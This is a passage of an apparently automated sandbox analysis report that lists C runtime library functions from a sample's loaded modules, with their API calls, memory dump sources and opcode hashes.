                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                          • String ID:
                                          • API String ID: 3916383385-0
                                          • Opcode ID: 41118b631b07f2b3b911b596b95b3a1fbb44d4a844002492ba11ff1bb227e5c2
                                          • Instruction ID: bdf9041628fa3369865df22bdd147b8407b03f0972e1fa2b0b5b1b9186eea6c9
                                          • Opcode Fuzzy Hash: 41118b631b07f2b3b911b596b95b3a1fbb44d4a844002492ba11ff1bb227e5c2
                                          • Instruction Fuzzy Hash: 1901F6B1A00664DFCB059F68FA48B997BB6FB0B712701806BE915D3214CBF95C00CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E3940A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E3940D5
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E39418E
                                          • __DestructExceptionObject.VCRUNTIME140 ref: 6E3941AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CurrentDestructExceptionImageNonwritableObject___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1849493825-1018135373
                                          • Opcode ID: aecd88b1bea20d2a1479528b35c0c750cc4f5e56cef68b3cdf3e81f97412661b
                                          • Instruction ID: 29f2d2d5f2f0860fb7225ad0b1584667648a0fc5a617d3b8c993278fd523aa7b
                                          • Opcode Fuzzy Hash: aecd88b1bea20d2a1479528b35c0c750cc4f5e56cef68b3cdf3e81f97412661b
                                          • Instruction Fuzzy Hash: C841C774A002099FCF00DF99D894AEEBBB9FF45318F108595EC249B391E732D916DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39D6C6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • Replicator::operator[].LIBCMT ref: 6E39D721
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D86C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Replicator::operator[]
                                          • String ID: ...$Y9n
                                          • API String ID: 3707554701-2185204884
                                          • Opcode ID: d2c17b3887790af9d0d384158e0f03ea3e9fc4baa095281891e255f391a59f73
                                          • Instruction ID: 6ce202433d59d4a419ed02bed00bbf78847d037d9a7103419e51c623cfb7fb13
                                          • Opcode Fuzzy Hash: d2c17b3887790af9d0d384158e0f03ea3e9fc4baa095281891e255f391a59f73
                                          • Instruction Fuzzy Hash: 5E51AEB9C0824A9EDB01CFE8C0966EEBBBDBB46300F90845ED455A7241F736D948EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E396A34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6E3969BE,?,?,00000000,00000000,00000000,?), ref: 6E396A59
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,?,?,?,?,6E3969BE,?,?,00000000,00000000,00000000,?,?), ref: 6E396B64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: EncodePointerabort
                                          • String ID: MOC$RCC
                                          • API String ID: 1188231555-2084237596
                                          • Opcode ID: 4b8da332586dccacd9c57486b9db443f97379f0921e123e28ddf2434bc291900
                                          • Instruction ID: ad187efa42bb6de2e685efcdf0f5c5af93b15f5d44621f4b087336434fd95430
                                          • Opcode Fuzzy Hash: 4b8da332586dccacd9c57486b9db443f97379f0921e123e28ddf2434bc291900
                                          • Instruction Fuzzy Hash: 32415A71911209AFDF01CFD4CD80ADEBBB9BF48304F158499E91467225E336D950EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E397480 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          • _FindAndUnlinkFrame.VCRUNTIME140(?), ref: 6E397494
                                          • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?), ref: 6E3974FE
                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001), ref: 6E397512
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                          • String ID: csm
                                          • API String ID: 1567117672-1018135373
                                          • Opcode ID: 1fd9c8e672d8f7fa8208659418bbd18b779fe11e1ff75f681156506fe6b034e2
                                          • Instruction ID: f723281ad465f4106359bf1041d88c2714c01d4e32b916b0c12ea42af77eca12
                                          • Opcode Fuzzy Hash: 1fd9c8e672d8f7fa8208659418bbd18b779fe11e1ff75f681156506fe6b034e2
                                          • Instruction Fuzzy Hash: CB313E32905301AFD7489FE9D840D85B779BF40269B8308D8E4654F2F2E772DA41EBE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39AEC3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6E39878D: pDNameNode::pDNameNode.LIBCMT ref: 6E3987B3
                                          • DName::DName.LIBVCRUNTIME ref: 6E39AF82
                                          • DName::operator+.LIBCMT ref: 6E39AF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name$Name::Name::operator+NodeNode::p
                                          • String ID: void$void
                                          • API String ID: 3257498322-3746155364
                                          • Opcode ID: b336ef41791fe77e4d6edc857799cc7a734e49a42e318373a4ca9302202791ac
                                          • Instruction ID: 419bef567dcff5f92996d3e431ed70e66c308f0b30c95aed3bb0e36616165c0d
                                          • Opcode Fuzzy Hash: b336ef41791fe77e4d6edc857799cc7a734e49a42e318373a4ca9302202791ac
                                          • Instruction Fuzzy Hash: EC214AB5C04209AFDF04DFD4C851AEE7BBDEF04344F40465AE952AB250FB359A48EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E398816 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: __aulldiv__aullrem
                                          • String ID: Y9n$|+uyo
                                          • API String ID: 3839614884-1341198111
                                          • Opcode ID: 514c9af83541796355eb775f379ba004c550a6e8724148ca605ab26933325d80
                                          • Instruction ID: 63b7c0424844ae4a67057b222a3d4c776c682120b7d1fc822913791b1d2158e6
                                          • Opcode Fuzzy Hash: 514c9af83541796355eb775f379ba004c550a6e8724148ca605ab26933325d80
                                          • Instruction Fuzzy Hash: EF11E671A052496BDB14CBEC9880BEEBBF8EF99304F10049EE041E7280E7B4AD048775
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E393110 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlUnwind.KERNEL32(?,6E393162,80000026,00000000,?,?), ref: 6E39315D
                                          • _local_unwind2.VCRUNTIME140(?,?,?), ref: 6E3931A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Unwind_local_unwind2
                                          • String ID: &$02CV
                                          • API String ID: 2435528123-3673091860
                                          • Opcode ID: 1ae624b5de7354adfd6225dbd2b63ff9df8e2d085f6c33dfde8b61ccc23da67e
                                          • Instruction ID: 091defb917de48aa116a95470cbc7bb4d698d93f1cc111b2e4d88584f9faf65f
                                          • Opcode Fuzzy Hash: 1ae624b5de7354adfd6225dbd2b63ff9df8e2d085f6c33dfde8b61ccc23da67e
                                          • Instruction Fuzzy Hash: F51128B5900215DBEB00AF98D985B9BB7A8FB04304F110950EC58AB296E775EC85DBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E3988A9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: __aulldiv__aullrem
                                          • String ID: Y9n$|+uyo
                                          • API String ID: 3839614884-1341198111
                                          • Opcode ID: 0d89550d69a89821abf763b148bb20975b63fe57bc80f89b369ae06bf2c9ff98
                                          • Instruction ID: 49d745ccc0502a7c5fcfe9a4ff75bbcaf788585dbc17db7e80c09e4163909e34
                                          • Opcode Fuzzy Hash: 0d89550d69a89821abf763b148bb20975b63fe57bc80f89b369ae06bf2c9ff98
                                          • Instruction Fuzzy Hash: 4501B132A00318BBDB10DBA88C80FEEB7FCAF99314F11045AE541B7280D7B4690487A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E397E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID: Bad dynamic_cast!$R{9n$R{9n
                                          • API String ID: 3997070919-839941646
                                          • Opcode ID: c97880f62fe93c3f774447d1c7e2f717ad549b50009a2632415ff3437b59bdf3
                                          • Instruction ID: 9bfd53e28c0549a425fe801393a1326673f9e484ffa44d5a085a1b0a10973d91
                                          • Opcode Fuzzy Hash: c97880f62fe93c3f774447d1c7e2f717ad549b50009a2632415ff3437b59bdf3
                                          • Instruction Fuzzy Hash: BC018F75900209AFCB01DFA8D590BAEBBB8FF85744F11409AEA15AB3D0E771ED01CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E396F20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _FindAndUnlinkFrame.VCRUNTIME140(?,6E396F08), ref: 6E396F2C
                                          • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?,6E396F08), ref: 6E396F7E
                                          • __DestructExceptionObject.VCRUNTIME140(00000001,?,6E396F08), ref: 6E396F94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                          • String ID: csm
                                          • API String ID: 1567117672-1018135373
                                          • Opcode ID: b25bfa1773b947021f8443ae2927a015e42cd56eba9288028060e79323b2b8bd
                                          • Instruction ID: 12b8a103b51ee77dc36a8c8a487f99b2cfddffc46c139337a744eb18cb357344
                                          • Opcode Fuzzy Hash: b25bfa1773b947021f8443ae2927a015e42cd56eba9288028060e79323b2b8bd
                                          • Instruction Fuzzy Hash: 81014F35827305DFDB348FA0D4106AEB7B8AF40315F50096EE88306650EB72EB85EAD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E3962B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6E3962E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: terminate
                                          • String ID: MOC$RCC$csm
                                          • API String ID: 1821763600-2671469338
                                          • Opcode ID: 1de89f1aba64555f6873c3d08e16a6e96e023981e7596cc58a2550ec74614068
                                          • Instruction ID: 7265e2a323784f77d2fa418d20f9b9f1030774b103a9b908c86abbb343d1a505
                                          • Opcode Fuzzy Hash: 1de89f1aba64555f6873c3d08e16a6e96e023981e7596cc58a2550ec74614068
                                          • Instruction Fuzzy Hash: A4F0A732411205EFD7009FE9C500688B76CFF85215F5204FAC98447230E7B9EA90DBC6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D172DEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D172D9D,00000000,?,00000001,?,?,?,6D172E8C,00000001,FlsFree,6D195C60,6D195C68), ref: 6D172DF9
                                          • GetLastError.KERNEL32(?,6D172D9D,00000000,?,00000001,?,?,?,6D172E8C,00000001,FlsFree,6D195C60,6D195C68,00000000,?,6D16B5AC), ref: 6D172E03
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D172E2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: f25d89880847a9abfc5e7be67e81f18c887300ddfe16929c9fb6ead28bf9f213
                                          • Instruction ID: f24cd5018f4ec32f32d6877169274ac702c09388bff8e4039c749289009c07a6
                                          • Opcode Fuzzy Hash: f25d89880847a9abfc5e7be67e81f18c887300ddfe16929c9fb6ead28bf9f213
                                          • Instruction Fuzzy Hash: EEE04F30288209BBEF201F61FC05F693F799F22B93F200020FA1CAC0A5EBF1D5529684
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16EE87 Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6D16EE8E
                                          • UnDecorator::getSymbolName.LIBCMT ref: 6D16EF20
                                          • DName::operator+.LIBCMT ref: 6D16F024
                                          • DName::DName.LIBVCRUNTIME ref: 6D16F0C7
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                            • Part of subcall function 6D16CC4C: DName::DName.LIBVCRUNTIME ref: 6D16CCAA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                          • String ID:
                                          • API String ID: 1134295639-0
                                          • Opcode ID: 0ac9e1b7afff721d20a3e01919e29ebe07c2c51739aa95933189bb720cae6269
                                          • Instruction ID: 9bfb9f26090c5780164a6325a87a46ff0237e084550eacf136850f04fee10d45
                                          • Opcode Fuzzy Hash: 0ac9e1b7afff721d20a3e01919e29ebe07c2c51739aa95933189bb720cae6269
                                          • Instruction Fuzzy Hash: 3A719D71D0529A8FDF01CFA4D580BEE7BB5BB19310F05815AD924EB249D7F49950CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16B5B7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: 8040b78a8315c4cb29fdcb4cb8e6d971cd1854121890b9d8c17b28762783b6ea
                                          • Instruction ID: ee3a99eace272e44237b16194778ef9d4f6f8861ccbc089fb73ab38a1438d3ea
                                          • Opcode Fuzzy Hash: 8040b78a8315c4cb29fdcb4cb8e6d971cd1854121890b9d8c17b28762783b6ea
                                          • Instruction Fuzzy Hash: 4E51DE72A096869FEB158F54DA40BBA77B4FF11304F11442DFA1446198E7F1E8A1CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1698A2 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: EqualOffsetTypeids
                                          • String ID:
                                          • API String ID: 1707706676-0
                                          • Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                          • Instruction ID: 88d50416d773af11e653fe67d15516a04dbb7843c88d9ab9313758cf3d186ffa
                                          • Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                          • Instruction Fuzzy Hash: CB41933590828A9FDF01CF68C4A15EEFBF4FF15314F114599D890A7258D7B2AA54CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E3977BD Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: EqualOffsetTypeids
                                          • String ID:
                                          • API String ID: 1707706676-0
                                          • Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                          • Instruction ID: ddd7463dd041b5e30e28b2b1a1f206c477a8a69e246120f543779e7d6a21bc4f
                                          • Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                          • Instruction Fuzzy Hash: 09418E35E1820A9FDF01CFA8C4916EEBBF5EF45324F10449AD890A72D0E737AA45DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D18B23A Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 6D18B30A
                                          • _free.LIBCMT ref: 6D18B333
                                          • SetEndOfFile.KERNEL32(00000000,6D189A49,00000000,6D189CE0,?,?,?,?,?,?,?,6D189A49,6D189CE0,00000000), ref: 6D18B365
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6D189A49,6D189CE0,00000000,?,?,?,?,00000000), ref: 6D18B381
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
